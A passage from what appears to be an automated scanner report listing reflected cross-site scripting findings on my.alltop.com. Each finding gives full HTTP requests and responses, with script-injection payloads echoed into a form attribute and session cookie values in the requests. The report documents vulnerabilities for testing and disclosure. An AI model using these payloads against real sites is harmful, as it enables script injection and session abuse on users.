Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f40afb"><script>alert(1)</script>655b90c610e" method="post" accept-charset="utf-8">
...[SNIP]...

1.104. http://my.alltop.com/alpha/f [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f0ef"><script>alert(1)</script>d47ef86f40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f?5f0ef"><script>alert(1)</script>d47ef86f40c=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f?5f0ef"><script>alert(1)</script>d47ef86f40c=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.105. http://my.alltop.com/alpha/f [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ec7e"><script>alert(1)</script>3019f0a8426 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012B)%3C/script%3E3ec7e"><script>alert(1)</script>3019f0a8426 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012B)%3C/script%3E3ec7e"><script>alert(1)</script>3019f0a8426" method="post" accept-charset="utf-8">
...[SNIP]...

1.106. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c1b4"><script>alert(1)</script>b16ac6f5f69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C2c1b4"><script>alert(1)</script>b16ac6f5f69/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:44 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C2c1b4"><script>alert(1)</script>b16ac6f5f69/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.107. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23e18"><script>alert(1)</script>7ac76a0e2a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C/style%3E%3C23e18"><script>alert(1)</script>7ac76a0e2a1/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:45 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C/style%3E%3C23e18"><script>alert(1)</script>7ac76a0e2a1/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.108. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea335"><script>alert(1)</script>051bda2056f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3Cea335"><script>alert(1)</script>051bda2056f/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3Cea335"><script>alert(1)</script>051bda2056f/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.109. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13727"><script>alert(1)</script>cff66e8d38d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E13727"><script>alert(1)</script>cff66e8d38d HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E13727"><script>alert(1)</script>cff66e8d38d" method="post" accept-charset="utf-8">
...[SNIP]...

1.110. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f18"><script>alert(1)</script>9d2ef1fc101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E?39f18"><script>alert(1)</script>9d2ef1fc101=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:42 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:43 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E?39f18"><script>alert(1)</script>9d2ef1fc101=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.111. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%22ns=%22netsparker(0x0001AE)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dffd"><script>alert(1)</script>494432b1804 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f1dffd"><script>alert(1)</script>494432b1804/%22ns=%22netsparker(0x0001AE) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:34 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:35 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:35 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
